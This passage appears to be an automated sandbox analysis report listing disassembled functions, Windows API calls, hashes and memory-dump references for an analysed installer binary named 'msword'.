                                                                            • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                            • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                            • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                            • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                            Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                            • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                            • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                            • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                            Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                            • API String ID: 1697273262-1764544995
                                                                            • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                            • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                            • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                            • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                            Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00404902
                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID: $@rD
                                                                            • API String ID: 3748168415-881980237
                                                                            • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                            • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                            • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                            • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                            Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                              • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                            • API String ID: 2577523808-3778932970
                                                                            • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                            • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                            • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                            • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                            Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatwsprintf
                                                                            • String ID: %02x%c$...
                                                                            • API String ID: 3065427908-1057055748
                                                                            • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                            • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                            • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                            • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                            Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405057
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                            • API String ID: 2266616436-4211696005
                                                                            • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                            • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                            Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00402100
                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                            • String ID:
                                                                            • API String ID: 1599320355-0
                                                                            • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                            • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                            Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                            • String ID: Version
                                                                            • API String ID: 512980652-315105994
                                                                            • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                            • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                            • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                            • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                            Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                            • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                            • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                            • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                            Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                            • String ID:
                                                                            • API String ID: 2883127279-0
                                                                            • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                            • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                            • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                            • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                            Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                            • String ID: !N~
                                                                            • API String ID: 623250636-529124213
                                                                            • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                            • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                            • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                            • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                            Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                            • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405C48
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                            • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                            • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                            • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                            Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3509786178-2769509956
                                                                            • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                            • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                            • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                            • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                            Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                            • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
